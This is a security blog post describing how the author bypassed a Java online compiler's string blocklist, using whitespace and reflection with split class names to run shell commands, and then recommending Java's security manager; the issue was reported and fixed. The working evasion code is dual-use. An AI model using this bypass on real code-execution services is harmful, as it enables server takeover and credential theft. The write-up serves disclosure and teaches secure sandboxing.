Perils of Source-based Sandboxing

I recently found a new website that will compile and execute Java code for you. It consists of a large textarea input for the source, a few buttons including "Compile & Execute", a panel showing output from the Java compiler, and a panel showing output from the code being executed. I was curious about whether any sandboxing is done on the site. If not, then an attacker might be able to execute malicious code directly on the server to take it over!

We could write the attack natively in Java, but shelling out is easier. The following code is a simple test that launches bash with a short script.

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.Process;

public class HelloWorld
{
  public static void main(String[] args)
  {
    try {
      Runtime runO = Runtime.getRuntime();

      String[] cmd = {"bash", "-c", "ls -la | tee -a /tmp/touchtest"};
      Process p = runO.exec(cmd);

      BufferedReader brO = new BufferedReader(
        new InputStreamReader(p.getInputStream())
      );

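      // Drain the output before waiting: if the child fills the pipe
      // buffer while nobody is reading, waitFor() would never return.
      StringBuffer sb = new StringBuffer();

      String line;
      while(true) {
        line = brO.readLine();
        if (line == null) break;
        sb.append(line);
        sb.append('\n');
      }
      System.out.print(sb);

      System.out.println("Exit code: "+p.waitFor());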
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

Trying to execute this code on the site gave me this program output:

Unable to execute program; disallowed functions!

Use of package 'java.io.' is forbidden. Use of package 'Runtime' is forbidden.

At first glance, this looks like reasonable protection. I vaguely knew that Java has sandboxing abilities, and it looks like packages and classes that allow IO are blocked.

Still, something about it rubs me the wrong way. Are all packages allowing IO blocked? Doesn't Java let you block by permissions more granularly? Why does "java.io." have a trailing period in the error message? I'm not sure I've ever seen any Java documentation or tool refer to a package that way. I don't think that forbidden package error is from a real Java tool. Could the site just have a fixed list of disallowed strings that it checks for in the source before executing?

I wonder if the site knows that spaces are allowed around the period delimiters. ... Changing "import java.io." to "import java. io." in the code makes that error go away! Yep, the site just has a string blocklist. The "Runtime" string is still blocked, though, with its own error. As I mentioned earlier, one doesn't need to execute shell commands for a good attack, but it seems like a fun challenge to get that working anyway. I'll have to figure out another strategy to get past the "'Runtime' is forbidden" error.
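
To make the failure concrete, here is a minimal sketch of what such a checker might look like. It is a guess, not the site's actual code: the class name NaiveBlocklist, the method findForbidden, and the two blocklist entries (taken from the error messages above) are all assumptions for illustration.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical reconstruction of a source-level blocklist. The real site's
// checker and its full list of forbidden strings are unknown.
final class NaiveBlocklist {
    // Assumed entries, taken from the two error messages the site printed.
    static final String[] FORBIDDEN = {"java.io.", "Runtime"};

    // Returns every forbidden string that occurs verbatim in the source text.
    static List<String> findForbidden(String source) {
        List<String> hits = new ArrayList<>();
        for (String needle : FORBIDDEN) {
            if (source.contains(needle)) {
                hits.add(needle);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        String plain = "import java.io.BufferedReader;";
        String spaced = "import java. io. BufferedReader;";
        System.out.println(findForbidden(plain));   // prints [java.io.]
        System.out.println(findForbidden(spaced));  // prints []
    }
}
```

Both import lines mean the same thing to the Java compiler, but only the first one contains the literal substring the checker looks for.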

The good news for us is that Java has Reflection APIs which allow you to load a class by name from a string. We can construct a string with the word "Runtime" at runtime! The word "Runtime" won't be present in the source code. Just for fun, we can use reflection to load the java.io classes too, since the trick with the space felt a bit cheap and could be countered with a simple regular expression by the server.

import java.lang.reflect.Method;
import java.lang.reflect.Constructor;
import java.lang.Process;

public class HelloWorld
{
  public static void main(String[] args)
  {
    try {
      Class<?> runC = Class.forName("java.lang.Ru" + "ntime");

      Method m = runC.getMethod("getRu" + "ntime");
      Object runO = m.invoke(null);
      Method exec = runC.getMethod("exec", new Class[] {String[].class});

      String[] cmd = {"bash", "-c", "ls -la | tee -a /tmp/touchtest"};
      Process p = (Process) exec.invoke(runO, new Object[] {cmd});

      Class<?> isC = Class.forName("jav"+"a.io.InputStream");
      Class<?> rC = Class.forName("jav"+"a.io.Reader");

      Class<?> isrC = Class.forName("jav"+"a.io.InputStreamReader");
      Constructor isrCon = isrC.getConstructor(isC);

      Class<?> brC = Class.forName("jav"+"a.io.BufferedReader");
      Constructor brCon = brC.getConstructor(rC);

      Object brO = brCon.newInstance(isrCon.newInstance(p.getInputStream()));
      Method brReadLine = brC.getMethod("readLine");

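      // Drain the output before waiting: if the child fills the pipe
      // buffer while nobody is reading, waitFor() would never return.
      StringBuffer sb = new StringBuffer();

      String line;
      while(true) {
        line = (String) brReadLine.invoke(brO);
        if (line == null) break;
        sb.append(line);
        sb.append('\n');
      }
      System.out.print(sb);

      System.out.println("Exit code: "+p.waitFor());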
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

Success, this code works on the site. It runs "ls -la | tee -a /tmp/touchtest" in a shell, listing the files in the current directory, and appending a copy of that listing to "/tmp/touchtest". From here, an attacker can scope out the server for more files and directories writable by the user running the code, possibly manipulate the site, gain further access to the server, or steal credentials from it. It's possible that the Java code is being run from a unique locked-down temporary account, nullifying much of the vulnerability, but maybe not.

So how should code like this be sandboxed? Are more string blocklists necessary to cover the Reflection APIs? More flexible regular expressions? I don't think so. You would have to look up all of Java's APIs that could be used for reflection, and update your blocklists as Java adds more. You would also have to carefully study Java's syntax to make sure you cover all of the possible unusual cases, like spaces around delimiters. What about null bytes, unprintable characters, and invalid UTF-8 sequences? The handling of those might be undefined in the standard. There are many possible edge cases. (And for other languages like C that allow macros, you would have to implement macro expansion in the blocklist checker too. If you ever find yourself making a Turing-complete blocklist checker, you might be doing something wrong!) You might as well use Java's own syntax parser for sandboxing rather than re-implement it yourself, and at that point you should remember that Java already has built-in runtime sandboxing abilities.
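
As a rough illustration of how quickly the edge cases pile up, the sketch below "hardens" the check with a regular expression that tolerates whitespace around the dots. The class RegexBlocklist and its patterns are hypothetical. It catches the spaced import, but Java also allows comments between tokens and translates Unicode escapes in source text before tokenizing, so the other samples (which should still compile to the same thing) get through.

```java
import java.util.regex.Pattern;

// Hypothetical "improved" blocklist; not the site's code.
final class RegexBlocklist {
    // java.io. with optional whitespace around each dot.
    static final Pattern JAVA_IO = Pattern.compile("java\\s*\\.\\s*io\\s*\\.");
    static final Pattern RUNTIME = Pattern.compile("Runtime");

    // True if either pattern occurs anywhere in the source text.
    static boolean isBlocked(String source) {
        return JAVA_IO.matcher(source).find() || RUNTIME.matcher(source).find();
    }

    public static void main(String[] args) {
        // The doubled backslashes keep the escapes literal inside these strings,
        // so each sample holds the text exactly as an attacker would submit it.
        String[] samples = {
            "import java. io. BufferedReader;",       // whitespace: caught
            "import java./**/io./**/BufferedReader;", // empty comments between tokens
            "import java.\\u0069o.BufferedReader;",   // escaped letter i
            "\\u0052untime.getRuntime();"             // escaped letter R
        };
        for (String s : samples) {
            System.out.println((isBlocked(s) ? "blocked: " : "missed:  ") + s);
        }
    }
}
```

Each new rule invites another workaround, which is the argument for letting the runtime enforce permissions instead of pattern-matching the source.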

I decided to read up on Java's sandboxing abilities and security policies. Here's what I found out. You can enable Java's security manager with the -Djava.security.manager="" argument. It applies the default security policy, which on Ubuntu 12.04 with OpenJDK can be found here. It's pretty locked down, except for a few things. It gives permissions to any extension libraries, which might be abusable. It gives permission to act as a host and listen on sockets. It gives permission to "stopThread", which comes with a big note that it's potentially unsafe. Here's a stricter Java policy file without those parts.

With that policy file saved as "/usr/local/share/java-strict.policy", a Java program can be executed in a locked-down context like this:

java -Djava.security.manager="" -Djava.security.policy=/usr/local/share/java-strict.policy HelloWorld
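
One way to check that the sandbox is actually in effect is a small probe program run in place of HelloWorld. The sketch below is illustrative only: SandboxProbe and isDenied are made-up names, and it assumes the policy in use does not grant read access to the "user.home" property or to "/etc/passwd". It also assumes a JDK where the security manager is still available; it has been deprecated since Java 17, and newer releases may refuse the flag.

```java
// Hypothetical probe: reports which harmless operations the JVM refuses.
final class SandboxProbe {
    // Runs the action and reports whether it was refused with a SecurityException.
    static boolean isDenied(Runnable action) {
        try {
            action.run();
            return false;
        } catch (SecurityException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        // Reading a system property that the policy is assumed not to grant.
        System.out.println("read user.home denied: "
            + isDenied(() -> System.getProperty("user.home")));
        // Checking a file triggers a read-permission check under a security manager.
        System.out.println("read /etc/passwd denied: "
            + isDenied(() -> new java.io.File("/etc/passwd").canRead()));
    }
}
```

Run with the two -D flags above, both lines would be expected to report true under those assumptions; run without them, both report false because nothing is checking permissions.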

Note that Java's sandboxing has a not-so-great track record (see how some browsers disable the Java browser plug-in by default nowadays), so depending on how important the server is, it may be a good idea to also run the Java code inside a locked-down account. And I don't think the policy prevents denial-of-service attacks that take up a lot of processor time or memory.
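
For the processor-time and memory side, one possible approach is to launch the untrusted program as a child JVM with a heap cap and kill it after a wall-clock timeout. This is only a sketch under assumptions: LimitedRunner, the 64 MB heap, and the 5 second limit are invented for illustration, -Xmx caps the Java heap rather than all memory the process can use, and OS-level limits on the account would be a stronger control.

```java
import java.io.File;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.OptionalInt;
import java.util.concurrent.TimeUnit;

// Hypothetical launcher for untrusted code; names and limits are illustrative.
final class LimitedRunner {
    // Builds the child JVM command line with a heap cap and the sandbox flags.
    static List<String> buildCommand(String mainClass, String policyPath, int maxHeapMb) {
        List<String> cmd = new ArrayList<>();
        cmd.add("java");
        cmd.add("-Xmx" + maxHeapMb + "m");
        cmd.add("-Djava.security.manager");
        cmd.add("-Djava.security.policy=" + policyPath);
        cmd.add(mainClass);
        return cmd;
    }

    // Runs the command with output sent to a file. Returns the exit code,
    // or an empty result if the child was killed for exceeding the timeout.
    static OptionalInt runWithTimeout(List<String> cmd, File output, long timeoutSeconds)
            throws IOException, InterruptedException {
        Process p = new ProcessBuilder(cmd)
            .redirectErrorStream(true)
            .redirectOutput(output)
            .start();
        if (!p.waitFor(timeoutSeconds, TimeUnit.SECONDS)) {
            p.destroyForcibly().waitFor();
            return OptionalInt.empty();
        }
        return OptionalInt.of(p.exitValue());
    }

    public static void main(String[] args) throws Exception {
        if (args.length == 0) {
            // Without a class name, just show the command that would be run.
            System.out.println(buildCommand("HelloWorld",
                "/usr/local/share/java-strict.policy", 64));
            return;
        }
        List<String> cmd = buildCommand(args[0], "/usr/local/share/java-strict.policy", 64);
        File out = File.createTempFile("untrusted", ".log");
        OptionalInt exit = runWithTimeout(cmd, out, 5);
        System.out.println(exit.isPresent() ? "exit code " + exit.getAsInt() : "killed after timeout");
    }
}
```

Sending the child's output to a file rather than a pipe means a chatty program cannot stall the launcher, and the file can be size-checked or read afterwards.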

So, in conclusion, if you have an automated system for letting other people run code on your system, make sure you have a good sandboxing system in place, and that the sandbox system isn't just a fixed list of disallowed strings. Besides online-IDE sort of sites, this seems to be an extremely common problem with systems for running programming contests. And in contest situations, the participants have a big incentive to try to manipulate the scoring system itself! Make sure the scoring part exists securely outside of the program's own sandbox.

I reported all of this to the site owner, and the site has since switched to using Java's security manager instead of the attempted source-based sandboxing.